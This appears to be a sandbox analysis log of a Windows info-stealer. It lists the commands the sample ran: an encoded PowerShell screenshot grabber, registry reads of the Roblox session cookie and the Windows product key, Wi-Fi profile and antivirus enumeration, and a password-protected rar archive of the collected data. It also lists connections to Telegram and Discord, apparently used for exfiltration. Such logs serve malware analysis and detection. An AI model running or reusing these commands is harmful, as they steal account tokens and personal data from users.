WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wkh4t1sn\wkh4t1sn.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES61B7.tmp" "c:\Users\Admin\AppData\Local\Temp\wkh4t1sn\CSC69C5BE3D6C0C44FC896D2263CA2F5C80.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.4.830145772\1605352394" -childID 3 -isForBrowser -prefsHandle 4968 -prefMapHandle 4536 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {734e8bd1-46a7-4a79-8b71-24bee9c0e9c1} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 1516 223be49e858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.5.1980498284\963284024" -childID 4 -isForBrowser -prefsHandle 5316 -prefMapHandle 5320 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3cd174f8-c3be-4fd7-a051-470bc97a90a5} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 5308 223bc9bf258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.6.1486222084\1260400303" -childID 5 -isForBrowser -prefsHandle 5504 -prefMapHandle 5512 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {09df27fd-de4d-4632-be21-80b1ce52955f} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 5496 223bc9c1c58 tab
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI43562\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\JJJed.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI43562\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI43562\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\JJJed.zip" *
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.7.2004441443\722180251" -childID 6 -isForBrowser -prefsHandle 5872 -prefMapHandle 5900 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d4b7970-6fa1-47ec-a704-f4cdc1db2166} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 5860 223b8fc9558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.8.2076159349\910925423" -parentBuildID 20230214051806 -prefsHandle 6260 -prefMapHandle 6268 -prefsLen 27697 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9908bd0-3c33-448b-9046-35dda54bd78f} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 6284 223b5b0e858 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.9.366663673\6351698" -parentBuildID 20230214051806 -sandboxingKind 1 -prefsHandle 3932 -prefMapHandle 4356 -prefsLen 27697 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38bfa30a-fe85-4b87-8033-afd19c3c2296} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 6480 223b5b97558 utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.10.1828842400\1531533435" -childID 7 -isForBrowser -prefsHandle 6596 -prefMapHandle 4420 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c0ae4b0-0f04-4850-ba26-057424ef0730} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 6608 223b5b99958 tab
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4d4 0x328
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.11.2118964846\1148024191" -parentBuildID 20230214051806 -sandboxingKind 0 -prefsHandle 5428 -prefMapHandle 5444 -prefsLen 27697 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {368352ac-3f94-4c21-ae16-1b214c431b85} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 5416 223bb20f258 utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.0.402255121\1251719960" -parentBuildID 20230214051806 -prefsHandle 1804 -prefMapHandle 1796 -prefsLen 22341 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4794aab3-583d-4b73-a00b-95b913515f55} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 1884 1aa925f6458 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.1.481195266\740456772" -parentBuildID 20230214051806 -prefsHandle 2424 -prefMapHandle 2420 -prefsLen 22377 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {63c935fa-ad64-4e29-b80c-99acabaabc4f} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 2452 1aa86789f58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.2.1675031286\1313524578" -childID 1 -isForBrowser -prefsHandle 2860 -prefMapHandle 2980 -prefsLen 22415 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3354eb02-5569-416b-b330-c93deb3d81b4} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 2952 1aa96436058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.3.424992339\993516848" -childID 2 -isForBrowser -prefsHandle 3908 -prefMapHandle 3904 -prefsLen 27881 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c42cee9-12ff-4fd8-b622-f5bf7463d06a} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 3920 1aa98431b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.4.1362514700\936678985" -childID 3 -isForBrowser -prefsHandle 5000 -prefMapHandle 4980 -prefsLen 27881 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7470e26-aa8b-4ca3-9d37-a293482b0052} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 5012 1aa9a6fde58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.5.1621330121\425148469" -childID 4 -isForBrowser -prefsHandle 5160 -prefMapHandle 5164 -prefsLen 27881 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c28d81eb-9e81-41ae-9413-55c155ea25cc} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 5148 1aa9ad2e558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.6.9664168\850547795" -childID 5 -isForBrowser -prefsHandle 5352 -prefMapHandle 5356 -prefsLen 27881 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f03d1cd4-be71-4c9b-abff-6a1b4147d1e2} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 5340 1aa9ad2b258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.7.435547975\693768245" -childID 6 -isForBrowser -prefsHandle 5680 -prefMapHandle 5676 -prefsLen 28105 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39458ac9-489d-46d2-b608-b2ff155eda80} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 5664 1aa98c4d558 tab
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 44.240.188.8:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | 8.188.240.44.in-addr.arpa | udp |
| N/A | 127.0.0.1:65220 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| N/A | 127.0.0.1:65235 | tcp | |
| US | 8.8.8.8:53 | discord.gg | udp |
| US | 162.159.130.234:80 | discord.gg | tcp |
| US | 8.8.8.8:53 | discord.gg | udp |
| US | 8.8.8.8:53 | discord.gg | udp |
| US | 162.159.130.234:443 | discord.gg | tcp |
| US | 8.8.8.8:53 | 234.130.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | udp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 8.8.8.8:53 | js.hcaptcha.com | udp |
| US | 104.19.230.21:443 | js.hcaptcha.com | tcp |
| US | 8.8.8.8:53 | js.hcaptcha.com | udp |
| US | 8.8.8.8:53 | js.hcaptcha.com | udp |
| US | 104.19.230.21:443 | js.hcaptcha.com | udp |
| US | 8.8.8.8:53 | newassets.hcaptcha.com | udp |
| US | 104.19.230.21:443 | newassets.hcaptcha.com | tcp |
| US | 104.19.230.21:443 | newassets.hcaptcha.com | tcp |
| US | 8.8.8.8:53 | newassets.hcaptcha.com | udp |
| US | 8.8.8.8:53 | newassets.hcaptcha.com | udp |
| US | 104.19.230.21:443 | newassets.hcaptcha.com | udp |
| US | 8.8.8.8:53 | api2.hcaptcha.com | udp |
| US | 104.19.230.21:443 | api2.hcaptcha.com | tcp |
| US | 8.8.8.8:53 | api2.hcaptcha.com | udp |
| US | 8.8.8.8:53 | api2.hcaptcha.com | udp |
| US | 8.8.8.8:53 | 21.230.19.104.in-addr.arpa | udp |
| US | 104.19.230.21:443 | api2.hcaptcha.com | udp |
| US | 8.8.8.8:53 | stun.l.google.com | udp |
| US | 8.8.8.8:53 | api.hcaptcha.com | udp |
| US | 74.125.250.129:19302 | stun.l.google.com | udp |
| US | 104.19.229.21:443 | api.hcaptcha.com | tcp |
| US | 8.8.8.8:53 | api.hcaptcha.com | udp |
| US | 8.8.8.8:53 | api.hcaptcha.com | udp |
| US | 8.8.8.8:53 | 129.250.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.229.19.104.in-addr.arpa | udp |
| US | 104.19.229.21:443 | api.hcaptcha.com | udp |
| US | 8.8.8.8:53 | imgs3.hcaptcha.com | udp |
| US | 104.19.230.21:443 | imgs3.hcaptcha.com | tcp |
| US | 104.19.230.21:443 | imgs3.hcaptcha.com | tcp |
| US | 8.8.8.8:53 | imgs3.hcaptcha.com | udp |
| US | 104.19.230.21:443 | imgs3.hcaptcha.com | tcp |
| US | 104.19.230.21:443 | imgs3.hcaptcha.com | tcp |
| US | 8.8.8.8:53 | imgs3.hcaptcha.com | udp |
| US | 104.19.230.21:443 | imgs3.hcaptcha.com | udp |
| US | 8.8.8.8:53 | api.hcaptcha.com | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.136.234:443 | gateway.discord.gg | tcp |
| US | 162.159.136.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | 234.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | remote-auth-gateway.discord.gg | udp |
| US | 8.8.8.8:53 | remote-auth-gateway.discord.gg | udp |
| US | 162.159.133.234:443 | remote-auth-gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.133.234:443 | remote-auth-gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | remote-auth-gateway.discord.gg | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.133.159.162.in-addr.arpa | udp |
| N/A | 127.0.0.1:6463 | tcp | |
| N/A | 127.0.0.1:6463 | tcp | |
| N/A | 127.0.0.1:6464 | tcp | |
| N/A | 127.0.0.1:6464 | tcp | |
| N/A | 127.0.0.1:6465 | tcp | |
| N/A | 127.0.0.1:6465 | tcp | |
| N/A | 127.0.0.1:6466 | tcp | |
| N/A | 127.0.0.1:6466 | tcp | |
| N/A | 127.0.0.1:6467 | tcp | |
| N/A | 127.0.0.1:6467 | tcp | |
| N/A | 127.0.0.1:6468 | tcp | |
| N/A | 127.0.0.1:6468 | tcp | |
| N/A | 127.0.0.1:6469 | tcp | |
| N/A | 127.0.0.1:6469 | tcp | |
| N/A | 127.0.0.1:6470 | tcp | |
| N/A | 127.0.0.1:6470 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 34.160.144.191:443 | prod.content-signature-chains.prod.webservices.mozgcp.net | tcp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
